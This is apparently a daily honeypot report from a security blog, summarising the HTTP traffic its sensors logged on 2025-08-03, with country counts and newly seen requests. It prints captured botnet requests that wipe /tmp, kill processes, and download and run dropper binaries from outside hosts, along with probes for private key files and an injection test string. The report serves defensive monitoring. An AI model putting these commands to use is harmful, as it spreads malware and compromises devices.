Skip to main content
  1. Daily-Posts/

Report: 2025-08-03

·355 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-03
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 16 new requests that have never been observed before (these were added to the monitored request database.).

A total of 515 requests were recorded during the day, originating from 5 different countries, with a peak of 156 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
59.36.175.218GET /shell?cd+/tmp;rm+-rf+*;wget+196.251.86.86/jaws;sh+/tmp/jaws HTTP/1.1
141.98.10.150GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+arm7;wget+http:/\x5C/vpn.cursinqfirewall.ru/home;chmod+777+home;./home+x.arm7;wget+http:/\x5C/vpn.cursinqfirewall.ru/aboutus;chmod+777+aboutus;./aboutus+x.arm4 HTTP/1.1
197.52.37.111GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
8.219.6.49GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.50.197GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
631\x00\x0E8\xB2}\xD2\xAD\xB0\xF0\xA9\x04\x00\x00\x00\x00\x00
691GET /downloads HTTP/1.1
701GET /shared HTTP/1.1
711GET /public HTTP/1.1
751GET /ssl/server.key HTTP/1.1
761GET /ssl/key.pem HTTP/1.1
771GET /jmx-console HTTP/1.1
851GET /Autodiscover/Autodiscover.xml HTTP/1.1
861GET /static/lang/custom/sbin/init HTTP/1.1
881GET /documents HTTP/1.1
911GET /mifs/rs/api/v2/featureusage?format=$%7b1234*2%7d HTTP/1.1
921GET /lang/custom/sbin/init HTTP/1.1
1701CONNECT 196.251.69.43:80 HTTP/1.0
1711\x04\x01\x00P\xC4\xFBE+\x00
1871GET /socket.io/1/?t=1754194716070 HTTP/1.1
1891\x00\x0E8\xA3\xC6\xD3

country_iso_code
#

number_of_occurencecountry_iso_code
0156US
183GB
250CN
338FR
431SC
524NL
616PL
714BG
812LT
912DE
1012AU
119UA
127IN
136RO
146HU
155VN
165ZA
173BR
183RU
193SG
202AE
212KR
222CH
232CA
242SE
252HK
261TW
271KZ
281EG
291GR
301SK
311JP
321TR
331IR

Related

Report: 2025-08-02
·340 words
Repport Daily
Report: 2025-08-01
·311 words
Repport Daily
Report: 2025-07-31
·296 words
Repport Daily